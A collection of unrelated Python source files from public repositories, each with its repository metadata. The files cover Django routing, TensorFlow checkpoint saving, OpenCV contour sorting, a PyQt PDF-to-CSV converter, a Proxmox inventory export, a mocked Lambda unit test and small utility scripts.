41e3f09609f0017ea4b0584225238b55a6cd1edd | be2ddc4d6dbca1dedd42b7b40704ef5ecf7d74cf | /studentg/redressal/committee_urls.py | 5671201ddd22250160037b398e2568f8c9e671d9 | [] | no_license | Saloni-000/KB220_TECHNOspired-1 | 4264a70e7219d6708aa84ce4c37bcaf61967ed8e | 708570764d15e46888f8a2fdb183352387535e03 | refs/heads/master | 2023-03-21T01:37:35.025566 | 2021-03-19T16:25:04 | 2021-03-19T16:25:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,484 | py | """studentg URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from accounts.views import SignupView
from django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView
from . import views
from studentg.views import overall_status_stats_chart
chartpatterns = [
path('', views.charts, name="charts"),
path('stats/status-chart/', views.status_stats_chart, name="status_stats_chart"),
path('stats/subcat-chart/', views.subcategory_stats_chart, name="subcat_stats_chart"),
path('stats/subcat-dependent-chart/', views.status_chart_for_subcategory, name="subcat_dependent_chart"),
path('rating-chart/', views.rating_bar_chart, name="rating_bar_chart"),
path('grievance-chart/', views.grievances_line_chart, name="grievance-chart"),
path('stats/overall-status-chart/', overall_status_stats_chart, name="overall_status_chart"),
]
dashpatterns = [
path('', views.DashboardView.as_view(), name="dashboard"),
path('all/grievances/', views.AllGrievances.as_view(), name="all_grievances"),
path('view/subcategories/', views.ViewSubcategories.as_view(), name="view_subcategories"),
path('view/grievance/<token>/', views.ViewGrievance.as_view(), name="view_grievance"),
path('view/members/', views.ViewMembers.as_view(), name="view_members"),
path('add/member/', views.AddMember.as_view(), name="add_member"),
path('remove/member/<pk>/', views.DeleteMember.as_view(), name="delete_member"),
path('remove/invited-member/<pk>/', views.DeleteInvitedMember.as_view(), name="delete_invited_member"),
path('view/bodies/', views.ViewBodies.as_view(), name="view_bodies"),
path('add/body/', views.AddBody.as_view(), name="add_body"),
path('remove/body/<pk>/', views.DeleteBody.as_view(), name="delete_body"),
path('view/students/', views.ViewStudents.as_view(), name="view_students"),
path('add/student/', views.AddStudent.as_view(), name="add_student"),
path('my/account/', PasswordChangeView.as_view(template_name="redressal/view_profile.html"),
name="password_change"),
path('settings/password/done/', PasswordChangeDoneView.as_view(template_name="redressal/password_change_done.html"),
name="password_change_done"),
path('charts/', include(chartpatterns)),
]
urlpatterns = [
path('', views.HomeView.as_view(), name="home"),
path('accounts/signup/<uidb64>/<token>/', SignupView.as_view(template_name="redressal/signup.html"), name='signup'),
path('accounts/', include('accounts.urls')),
path('dashboard/', include(dashpatterns)),
]
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"smartyaziz99@gmail.com"
] | smartyaziz99@gmail.com |
0c4bb10e987777fae9cc78ed90940998e95d1024 | 6805b5299355005536d7408a2092db5cdf7f78d3 | /utils/saver.py | 94ca9f01d939bba00e341c74d18af9c619879727 | [] | no_license | harisris/draw-mnist | 050609c9bcc3a1690836467179660af186d544a9 | 7cfaa76336714ec4c290d84243115b5184142768 | refs/heads/master | 2021-01-12T10:03:39.163704 | 2016-06-08T09:19:53 | 2016-06-08T09:19:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,863 | py | import cslab_environ
import fnmatch
import logger
import os
import yaml
import tensorflow as tf
kModelOptFilename = 'model_opt.yaml'
kDatasetOptFilename = 'dataset_opt.yaml'
kMaxToKeep = 2
class Saver():
def __init__(self, folder, model_opt=None, data_opt=None):
if not os.path.exists(folder):
os.makedirs(folder)
self.folder = folder
self.log = logger.get()
self.tf_saver = None
if model_opt is not None:
self.save_opt(os.path.join(folder, kModelOptFilename), model_opt)
if data_opt is not None:
self.save_opt(os.path.join(folder, kDatasetOptFilename), data_opt)
pass
def save(self, sess, global_step=None):
"""Save checkpoint.
Args:
global_step:
"""
if self.tf_saver is None:
self.tf_saver = tf.train.Saver(
tf.all_variables(), max_to_keep=kMaxToKeep)
ckpt_path = os.path.join(self.folder, 'model.ckpt')
self.log.info('Saving checkpoint to {}'.format(ckpt_path))
self.tf_saver.save(sess, ckpt_path, global_step=global_step)
pass
def save_opt(self, fname, opt):
with open(fname, 'w') as f:
yaml.dump(opt, f, default_flow_style=False)
def get_latest_ckpt(self):
"""Get the latest checkpoint filename in a folder."""
ckpt_fname_pattern = os.path.join(self.folder, 'model.ckpt-*')
ckpt_fname_list = []
for fname in os.listdir(self.folder):
fullname = os.path.join(self.folder, fname)
if fnmatch.fnmatch(fullname, ckpt_fname_pattern):
if not fullname.endswith('.meta'):
ckpt_fname_list.append(fullname)
if len(ckpt_fname_list) == 0:
raise Exception('No checkpoint file found.')
ckpt_fname_step = [int(fn.split('-')[-1]) for fn in ckpt_fname_list]
latest_step = max(ckpt_fname_step)
latest_ckpt = os.path.join(self.folder,
'model.ckpt-{}'.format(latest_step))
latest_graph = os.path.join(self.folder,
'model.ckpt-{}.meta'.format(latest_step))
return (latest_ckpt, latest_graph, latest_step)
def get_ckpt_info(self):
"""Get info of the latest checkpoint."""
if not os.path.exists(self.folder):
raise Exception('Folder "{}" does not exist'.format(self.folder))
model_id = os.path.basename(self.folder.rstrip('/'))
self.log.info('Restoring from {}'.format(self.folder))
model_opt_fname = os.path.join(self.folder, kModelOptFilename)
data_opt_fname = os.path.join(self.folder, kDatasetOptFilename)
if os.path.exists(model_opt_fname):
with open(model_opt_fname) as f_opt:
model_opt = yaml.load(f_opt)
else:
model_opt = None
self.log.info('Model options: {}'.format(model_opt))
if os.path.exists(data_opt_fname):
with open(data_opt_fname) as f_opt:
data_opt = yaml.load(f_opt)
else:
data_opt = None
ckpt_fname, graph_fname, latest_step = self.get_latest_ckpt()
self.log.info('Restoring at step {}'.format(latest_step))
return {
'ckpt_fname': ckpt_fname,
'graph_fname': graph_fname,
'model_opt': model_opt,
'data_opt': data_opt,
'step': latest_step,
'model_id': model_id
}
def restore(self, sess, ckpt_fname=None):
"""Restore the checkpoint file."""
if ckpt_fname is None:
ckpt_fname = self.get_latest_ckpt()[0]
if self.tf_saver is None:
self.tf_saver = tf.train.Saver(tf.all_variables())
self.tf_saver.restore(sess, ckpt_fname)
pass
| [
"renmengye@gmail.com"
] | renmengye@gmail.com |
280fa588eaa9caf6d19665bf34d170cb7b0fcf06 | e1def0cb3ea2f1b9e7e8c9183ef3eae6eb4f2d97 | /Moudel1/Outline_Sort.py | 8278d28cec2edb53b08d42112b0c289f74a5682e | [] | no_license | w-x-me/PyImageSearch | 58084fd4834457a10a75383702093f5d98a0e6e4 | fc6034ae43767f9ec5cc0d4e6bb771d70a866a56 | refs/heads/master | 2020-03-20T07:50:17.690517 | 2018-06-14T02:08:51 | 2018-06-14T02:08:51 | 134,201,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,691 | py | import numpy as np
import argparse
import cv2
def sort_contours(cnts, method = "left-to-right"):
reverse = False
i = 0
if method == "right-to-left" or method == "bottom-to-top":
reverse = True
if method == "top-to-left" or method == "bottom-to-top":
i = 1
boundingBoxes = [cv2.boundingRect(c) for c in cnts]
(cnts, boundingBoxes) = zip(*sorted(zip(cnts, boundingBoxes),key=lambda b:b[1][i], reverse=reverse))
return (cnts, boundingBoxes)
def draw_contour(image, c, i):
M = cv2.moments(c)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
cv2.putText(image, "#{}".format(i + 1), (cX - 20, cY), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2)
return image
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True, help = "Path to input image")
ap.add_argument("-m", "--method", required = True, help = "Sorting method")
args = vars(ap.parse_args())
image = cv2.imread(args["image"])
accumEdged = np.zeros(image.shape[:2], dtype = "uint8")
for chan in cv2.split(image):
chan = cv2.medianBlur(chan, 11)
edged = cv2.Canny(chan, 50, 200)
accumEdged = cv2.bitwise_or(accumEdged, edged)
cv2.imshow("Edge Map", accumEdged)
(cnts, _) = cv2.findContours(accumEdged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]
orig = image.copy()
for (i, c) in enumerate(cnts):
orig = draw_contour(orig, c, i)
cv2.imshow("Unsorted", orig)
(cnts,boundingBoxes) = sort_contours(cnts, method = args["method"])
for (i, c) in enumerate(cnts):
draw_contour(image, c, i)
cv2.imshow("Sorted", image)
cv2.waitKey(0)
| [
"w-x-me@985808898@qq.com"
] | w-x-me@985808898@qq.com |
8f6ccdd1171460bb521a2f360412fd8e4a308765 | 3076fc0c3ceb285cc2db6f0d19f045c274adcceb | /[Bali]_Coco_Supermarket/app.py | 4b9184d7a9eb917f248e27135f8deca028d1f937 | [] | no_license | evosys/CSVConverter | 121b0c23e18cf59b939352b751be5e8ce12b4999 | 6026870975001f34608fc1303ed922d0f8e474ef | refs/heads/master | 2020-03-17T12:40:14.406236 | 2019-02-15T08:41:51 | 2019-02-15T08:41:51 | 133,597,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,544 | py | # -*- coding: utf-8 -*-
# @Author: ichadhr
# @Date: 2018-10-02 17:28:58
# @Last Modified by: richard.hari@live.com
# @Last Modified time: 2018-10-08 14:15:15
import sys
import time
import os
import appinfo
import itertools
import subprocess
import re
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from gui import Ui_MainWindow
from pathlib import Path
import distutils.dir_util
import distutils.spawn
# import warnings
# variabel for header CSV
HEAD_CODE_STORE = 'code_store'
HEAD_PO_NO = 'po_no'
HEAD_BARCODE = 'barcode'
HEAD_QTY = 'qty'
HEAD_MODAL = 'modal_karton'
NEWDIR = 'CSV-output'
DELIM = ';'
# CODE_STORE = '047361'
IS_WIN32 = 'win32' in str(sys.platform).lower()
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
# warnings.filterwarnings("ignore", message="RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibity. Expected 56, got 52")
# main class
class mainWindow(QMainWindow, Ui_MainWindow) :
def __init__(self) :
QMainWindow.__init__(self)
self.setupUi(self)
# app icon
self.setWindowIcon(QIcon(':/resources/icon.png'))
# centering app
tr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
tr.moveCenter(cp)
self.move(tr.topLeft())
# path tabula
self.jarfile = resource_path("tabula/bin/tabula-1.0.2-jar-with-dependencies.jar")
# button Open
self.btOpen.clicked.connect(self.openPDF)
# button convert
self.btCnv.clicked.connect(self.BtnCnv)
# add item to combobox
self.cbOutlet.addItem('COCO MART DC', '058616')
self.cbOutlet.addItem('COCO MART MUMBUL', '058605')
self.cbOutlet.addItem('COCO MART JIMBARAN', '050018')
self.cbOutlet.addItem('COCO MART BATUBULAN 13206/43006', '047375')
self.cbOutlet.addItem('COCO SUPERMARKET UBUD 13208/43008', '047361')
# status bar
self.statusBar().showMessage('v'+appinfo._version)
# hide label path
self.lbPath.hide()
self.lbPath.clear()
# PATH FILE
def openPDF(self) :
fileName, _ = QFileDialog.getOpenFileName(self,"Open File", "","PDF Files (*.pdf)")
if fileName:
self.lbPath.setText(fileName)
x = QUrl.fromLocalFile(fileName).fileName()
self.edFile.setText(x)
self.edFile.setStyleSheet("""QLineEdit { color: green }""")
# Create Directory
def CreateDir(self, cDIR, nDir, filename) :
resPathFile = os.path.abspath(os.path.join(cDIR, nDir, "{}.csv".format(filename)))
if os.path.exists(resPathFile) :
os.remove(resPathFile)
else :
# os.makedirs(os.path.dirname(resPathFile), exist_ok=True)
distutils.dir_util.mkpath(os.path.dirname(resPathFile))
return resPathFile
# open file
def open_file(self, filename):
if sys.platform == "win32":
os.startfile(filename)
else:
opener ="open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
# running tabula
def tabula(self, jarfile, coordinate, pathFile) :
output = self.launchWithoutConsole('java', ['-jar', str(jarfile), '-p', 'all', '-a', str(coordinate), str(pathFile)])
return output
def launchWithoutConsole(self, command, args):
"""Launches 'command' windowless and waits until finished"""
startupinfo = subprocess.STARTUPINFO()
stdin = subprocess.PIPE
stdout = subprocess.PIPE
stderr = subprocess.PIPE
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
tmpRes, err = subprocess.Popen([command] + args, startupinfo=startupinfo, stdin=stdin, stderr=stderr, stdout=stdout).communicate()
result = tmpRes.decode('utf-8').splitlines()
return result
def PDFponum(self, pathPDF) :
crdnt = "126.066,78.466,135.734,172.178"
result = self.tabula(self.jarfile, crdnt, pathPDF)
return result
def PDFbarcode(self, pathPDF) :
crdnt = "180.359,30.866,840.809,107.472"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult, True)
return result
def PDFqty(self, pathPDF) :
crdnt = "180.359,382.659,839.322,426.541"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult, True)
return result
def PDFmodal(self, pathPDF) :
crdnt = "179.616,309.028,838.578,382.6598"
tmpResult = self.tabula(self.jarfile, crdnt, pathPDF)
result = self.checkListFloat(tmpResult)
return result
# check a list for float type value
def checkListFloat(self, arList, isfloat = False) :
result = []
if isfloat :
for _i in arList:
if self.checkFLoat(_i) :
result.append([int(float(_i))])
else :
for _i in arList:
res = re.sub('[^\d\.,]', '', _i)
if res :
result.append([res])
return result
# check float
def checkFLoat(self, value) :
try :
return float(value).is_integer()
except ValueError:
return False
# button convert CSV
def BtnCnv(self) :
checkJava = distutils.spawn.find_executable("java")
if checkJava is not None :
current_dir = os.getcwd()
# PATH file
pathPDF = self.lbPath.text()
resPath, resFilename = os.path.split(os.path.splitext(pathPDF)[0])
resPathFile = self.CreateDir(current_dir, NEWDIR, resFilename)
resultPath = Path(os.path.abspath(os.path.join(current_dir, NEWDIR)))
CODE_STORE = str(self.cbOutlet.itemData(self.cbOutlet.currentIndex()))
tmpponum = self.PDFponum(pathPDF)
ponum = tmpponum[0]
brc = self.PDFbarcode(pathPDF)
qty = self.PDFqty(pathPDF)
mdl = self.PDFmodal(pathPDF)
# prepare write CSV
with open(resPathFile, "w+") as csv :
# write first header
csv.write(HEAD_CODE_STORE + DELIM + HEAD_PO_NO + DELIM + HEAD_BARCODE + DELIM + HEAD_QTY + DELIM + HEAD_MODAL)
# write new line
csv.write("\n")
for br, qt, md in zip(brc, qty, mdl) :
for resCD, resPO, resBC, resQT, resMD in zip(itertools.repeat(CODE_STORE, len(br)), itertools.repeat(ponum, len(br)), br, qt, md) :
resBC = str(resBC)
resQT = str(resQT)
resMD = str(resMD)
csv.write(resCD+DELIM+resPO+DELIM+resBC+DELIM+resQT+DELIM+resMD+'\n')
csv.close()
reply = QMessageBox.information(self, "Information", "Success!", QMessageBox.Ok)
if reply == QMessageBox.Ok :
self.open_file(str(resultPath))
else :
msg = "``java` command is not found in this system. Please ensure Java is installed and PATH is set for `java`"
QMessageBox.critical(self, "Error", msg, QMessageBox.Ok)
if __name__ == '__main__' :
app = QApplication(sys.argv)
# create splash screen
splash_pix = QPixmap(':/resources/unilever_splash.png')
splash = QSplashScreen(splash_pix, Qt.WindowStaysOnTopHint)
splash.setWindowFlags(QtCore.Qt.FramelessWindowHint)
splash.setEnabled(False)
# adding progress bar
progressBar = QProgressBar(splash)
progressBar.setMaximum(10)
progressBar.setGeometry(17, splash_pix.height() - 20, splash_pix.width(), 50)
splash.show()
for iSplash in range(1, 11) :
progressBar.setValue(iSplash)
t = time.time()
while time.time() < t + 0.1 :
app.processEvents()
time.sleep(1)
window = mainWindow()
window.setWindowTitle(appinfo._appname)
# window.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)
# window.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
window.show()
splash.finish(window)
sys.exit(app.exec_())
| [
"ichadhr@gmail.com"
] | ichadhr@gmail.com |
1ae2756ffd67ded6954b7e80528cc6c0ec45d4bb | b21182c969a102de41ca785be7e2e2e270977786 | /pyproxmox_to_xls.py | b37bde734045fbcf29799b45f1651c864f4148cf | [] | no_license | Mythological/Proxmox_node_ip_to_xls | a9357b17810dc0fe5ae716019af3ce744f071d2b | 08788f00bce114530be198d076483e028cf3332b | refs/heads/master | 2020-06-28T19:33:13.986717 | 2016-11-23T06:22:04 | 2016-11-23T06:22:04 | 74,480,790 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py |
from pyproxmox import *
import xlwt
import getpass
import os
ip_addr = raw_input("Proxmox's host or IP:")
login = raw_input("login:")
realm = raw_input("Realm[pam]:") or "pam"
passw = getpass.getpass("Password:")
a = prox_auth(ip_addr,login + '@' + realm ,passw)
b = pyproxmox(a)
a2 = b.getClusterStatus()
a3 = a2[u'data']
#for i in a3:
# print i.get(u'name')
# print i.get(u'ip')
workbook = xlwt.Workbook()
sheet = workbook.add_sheet("Sheet1", cell_overwrite_ok=True)
count = 0
count2 = 0
for i in a3:
sheet.write(count, 0, i.get(u'name'))
sheet.write(count2, 1, i.get(u'ip'))
count += 1
count2 += 1
workbook.save("Nodes_ip_proxmox.xls")
print "File created at:" +" "+ os.path.abspath("Nodes_ip_proxmox.xls")
| [
"noreply@github.com"
] | Mythological.noreply@github.com |
105eb9656b3a6ada066aa37a090ac4ccdfde566b | c19b84dba08bc8616348cc4f3daee10f1bb128a5 | /src/tests/unit/test_get_chars_for_list_id.py | 8ebcb0278ba9795d791000e7e554c169033892ba | [] | no_license | em-shea/vocab | 4bb0e5272444ce71852febb6984b2be9466959ca | 0f53213b8d889845775d14c3bed4ac7938a7011f | refs/heads/master | 2023-07-20T00:27:57.661107 | 2022-09-10T17:23:45 | 2022-09-10T17:23:45 | 161,578,317 | 72 | 24 | null | 2022-05-25T05:45:50 | 2018-12-13T03:23:14 | Python | UTF-8 | Python | false | false | 7,520 | py | import sys
import json
sys.path.append('../../')
sys.path.append('../../layer/python')
import unittest
from unittest import mock
with mock.patch.dict('os.environ', {'AWS_REGION': 'us-east-1', 'TABLE_NAME': 'mock-table'}):
from get_chars_for_list_id.app import lambda_handler
def mocked_query_dynamodb(list_id, limit=None, last_word_token=None, audio_file_key_check=False):
return {
"Items":
[
{
"SK":"WORD#12345",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "你好",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
},
{
"SK":"WORD#23456",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "我",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
},
{
"SK":"WORD#34567",
"PK":"LIST#1ebcad41-197a-123123",
"Word":{
"Simplified": "你",
"Definition": "word definition",
"Pinyin": "word pinyin",
"Audio file key": ""
}
}
]
}
class GetCharsForListIdTest(unittest.TestCase):
@mock.patch('list_word_service.query_dynamodb', side_effect=mocked_query_dynamodb)
def test_build(self, query_dynamodb_mock):
response = lambda_handler(self.apig_event(), "")
self.assertEqual(query_dynamodb_mock.call_count, 1)
def apig_event(self):
return {
"list_id": "12345",
"last_word_token": "",
"resource": "/generate_audio",
"path": "/generate_audio",
"httpMethod": "GET",
"headers": {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5",
"Authorization": "123123123",
"CloudFront-Forwarded-Proto": "https",
"CloudFront-Is-Desktop-Viewer": "true",
"CloudFront-Is-Mobile-Viewer": "false",
"CloudFront-Is-SmartTV-Viewer": "false",
"CloudFront-Is-Tablet-Viewer": "false",
"CloudFront-Viewer-Country": "GB",
"Host": "api.haohaotiantian.com",
"origin": "http://localhost:8080",
"Referer": "http://localhost:8080/",
"sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
"sec-ch-ua-mobile": "?0",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "cross-site",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Via": "2.0 123.cloudfront.net (CloudFront)",
"X-Amz-Cf-Id": "Iz123BjvWaSJQw==",
"X-Amzn-Trace-Id": "Roo12312348867cca34e3",
"X-Forwarded-For": "81.123",
"X-Forwarded-Port": "443",
"X-Forwarded-Proto": "https"
},
"multiValueHeaders": {
"Accept": [
"application/json, text/plain, */*"
],
"Accept-Encoding": [
"gzip, deflate, br"
],
"Accept-Language": [
"en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5"
],
"Authorization": [
"123123123"
],
"CloudFront-Forwarded-Proto": [
"https"
],
"CloudFront-Is-Desktop-Viewer": [
"true"
],
"CloudFront-Is-Mobile-Viewer": [
"false"
],
"CloudFront-Is-SmartTV-Viewer": [
"false"
],
"CloudFront-Is-Tablet-Viewer": [
"false"
],
"CloudFront-Viewer-Country": [
"GB"
],
"Host": [
"api.haohaotiantian.com"
],
"origin": [
"http://localhost:8080"
],
"Referer": [
"http://localhost:8080/"
],
"sec-ch-ua": [
"\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\""
],
"sec-ch-ua-mobile": [
"?0"
],
"sec-fetch-dest": [
"empty"
],
"sec-fetch-mode": [
"cors"
],
"sec-fetch-site": [
"cross-site"
],
"User-Agent": [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
],
"Via": [
"2.0 123.cloudfront.net (CloudFront)"
],
"X-Amz-Cf-Id": [
"IzAVY123WaSJQw=="
],
"X-Amzn-Trace-Id": [
"Root=1-12367cca34e3"
],
"X-Forwarded-For": [
"123"
],
"X-Forwarded-Port": [
"443"
],
"X-Forwarded-Proto": [
"https"
]
},
"queryStringParameters": "None",
"multiValueQueryStringParameters": "None",
"pathParameters": "None",
"stageVariables": "None",
"requestContext": {
"resourceId": "vylypt",
"authorizer": {
"claims": {
"sub": "770123132862dba2",
"aud": "mi4ig1231236mgodd",
"email_verified": "true",
"event_id": "cc6a1231239878f86be",
"token_use": "id",
"auth_time": "123",
"iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_123123",
"cognito:username": "770e2123123862dba2",
"exp": "Sat Jul 03 12:33:44 UTC 2021",
"iat": "Sat Jul 03 11:33:44 UTC 2021",
"email": "test@email.com"
}
},
"resourcePath": "/user_data",
"httpMethod": "GET",
"extendedRequestId": "B5JkUG123FeWw=",
"requestTime": "03/Jul/2021:12:20:43 +0000",
"path": "/user_data",
"accountId": "132123",
"protocol": "HTTP/1.1",
"stage": "Prod",
"domainPrefix": "api",
"requestTimeEpoch": 123123,
"requestId": "91d7123123f4a3764",
"identity": {
"cognitoIdentityPoolId": "None",
"accountId": "None",
"cognitoIdentityId": "None",
"caller": "None",
"sourceIp": "81.123",
"principalOrgId": "None",
"accessKey": "None",
"cognitoAuthenticationType": "None",
"cognitoAuthenticationProvider": "None",
"userArn": "None",
"userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"user": "None"
},
"domainName": "api.haohaotiantian.com",
"apiId": "123"
},
"isBase64Encoded": False
} | [
"c.emilyshea@gmail.com"
] | c.emilyshea@gmail.com |
51ddda72bb91f79aefbb68b25280eba14db6151a | 81ac429e642c1f93f91c2358d975e314a79b3232 | /grillplanner/wsgi.py | d2531a8c1aafb3e2f7c2bf0e80b1eb2f5a311860 | [] | no_license | d70-t/grillplaner | af95297fc0563a067728644af0f1022f2c43f774 | ea32210a908408b6b684085575b46e7809679e7b | refs/heads/master | 2020-03-18T07:35:25.276738 | 2018-06-05T13:02:10 | 2018-06-05T13:02:10 | 134,462,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for grillplanner project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "grillplanner.settings")
application = get_wsgi_application()
| [
"tobi@die70.de"
] | tobi@die70.de |
ed28d70f2179176fbf72c8f2715244cab656f33f | dbdc5835bd2e7c5dd924f35cdf4f66962ff2d59f | /Section-2/Simple_Linear_Regression/venv/bin/f2py | b7ef5ba9a5c9c6a44aebd69e85ec15b2285606c2 | [] | no_license | nikhilkumar9687/ML_code_in_Python | cdf0aafbb04b93bcefedd1350a5fe346c16ba147 | 692a43913113a6220aa6a909d83324e479757082 | refs/heads/master | 2022-10-06T12:58:36.029058 | 2020-06-08T20:25:19 | 2020-06-08T20:25:19 | 266,406,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | #!/home/nikhil/Desktop/Machine+Learning+A-Z+(Codes+and+Datasets)/My_Code/Section-2/Simple_Linear_Regression/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kumar.nikhil9687@gmail.com"
] | kumar.nikhil9687@gmail.com | |
aa00df2b260e6c6ab031c83ba1170fc89fa50eee | f6814281de06f6d6eff1cc9b40f9596274455ece | /segmentation/local_maxima.py | 7ba208efda2582ce2001beca2c44eabccf246bdb | [
"MIT"
] | permissive | file-campuran/scikit-image-clustering-scripts | 806ad366202f3054bf0f602e414c083428372177 | 2197f23b904463b358421bc8a8bd85a3cb4cc2f1 | refs/heads/master | 2022-10-07T23:17:18.814705 | 2020-06-02T18:00:37 | 2020-06-02T18:00:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | #!/usr/bin/env python
# http://stackoverflow.com/questions/9111711/get-coordinates-of-local-maxima-in-2d-array-above-certain-value
import numpy as np
from osgeo import gdal
import scipy.ndimage as ndimage
import scipy.ndimage.filters as filters
# initialize driver
driver = gdal.GetDriverByName('GTiff')
def write_image(img, filename):
"""
Write img array to a file with the given filename
Args:
img (Band)
filename (str)
"""
x_size = img.shape[1]
y_size = img.shape[0]
dataset = driver.Create(filename, x_size, y_size)
dataset.GetRasterBand(1).WriteArray(img)
# load original image
dataset = gdal.Open('img/mozambique-after-subset.tif')
band = dataset.GetRasterBand(1)
img = band.ReadAsArray().astype(np.uint8)
# position of local maxima
data_max = filters.maximum_filter(img, 5)
maxima = (img == data_max)
data_min = filters.minimum_filter(img, 5)
diff = ((data_max - data_min) > 150)
maxima[diff == 0] = 0
write_image(maxima, 'img/maxima.tif')
| [
"h.benoudjit@gmail.com"
] | h.benoudjit@gmail.com |
8d46d4d91c2a121fd214c9ccf2d35f826893683b | 750932da205e48eb860f72fa35579e2f7c78b69c | /django-silk-example/manage.py | 8201ceddde55f39f2b499d0d80c3635e4f50de0d | [
"MIT"
] | permissive | 510908220/django-performance-optimization | 8251682c41be4695947c07d958fa96f2e6b162af | 53f62dc8741b1c72f1f97155a1e2c05c1483bd92 | refs/heads/master | 2022-12-13T14:48:40.864496 | 2018-04-28T02:04:20 | 2018-04-28T02:05:28 | 130,834,744 | 1 | 0 | MIT | 2022-12-08T02:04:24 | 2018-04-24T10:07:39 | Python | UTF-8 | Python | false | false | 544 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "silk_example.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"510908220@qq.com"
] | 510908220@qq.com |
5bf8de204ab7c6510a81ed63729019d2bf497ec1 | 61db901b72461684eb4d78d278e07ac49e98cba2 | /precourse_wk3d1/yes_no.py | 4ddeb9592cee7102e5269da64f2cdfc8fe3da546 | [] | no_license | calebkress/practice-python-scripts | 0b5e9cf27801ad5759e6f3283e6326f405d812f8 | 9fac1a6e7be245ea44486e3adc6f14df3e9a7e5d | refs/heads/master | 2020-04-05T02:27:34.285550 | 2019-03-27T18:27:07 | 2019-03-27T18:27:07 | 156,477,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | # Takes a list of numbers and an integer, and returns an array saying whether each number in the list is divisible by the second number.
def yes_no(num_str = raw_input('Enter a list of comma-separated numbers: '), num = input('Enter a number to divide by: ')):
num_list = num_str.split(', ')
print(num_list)
result = ['yes' if int(i) % num == 0 else 'no' for i in num_list]
return result
print(yes_no())
| [
"calebkress@gmail.com"
] | calebkress@gmail.com |
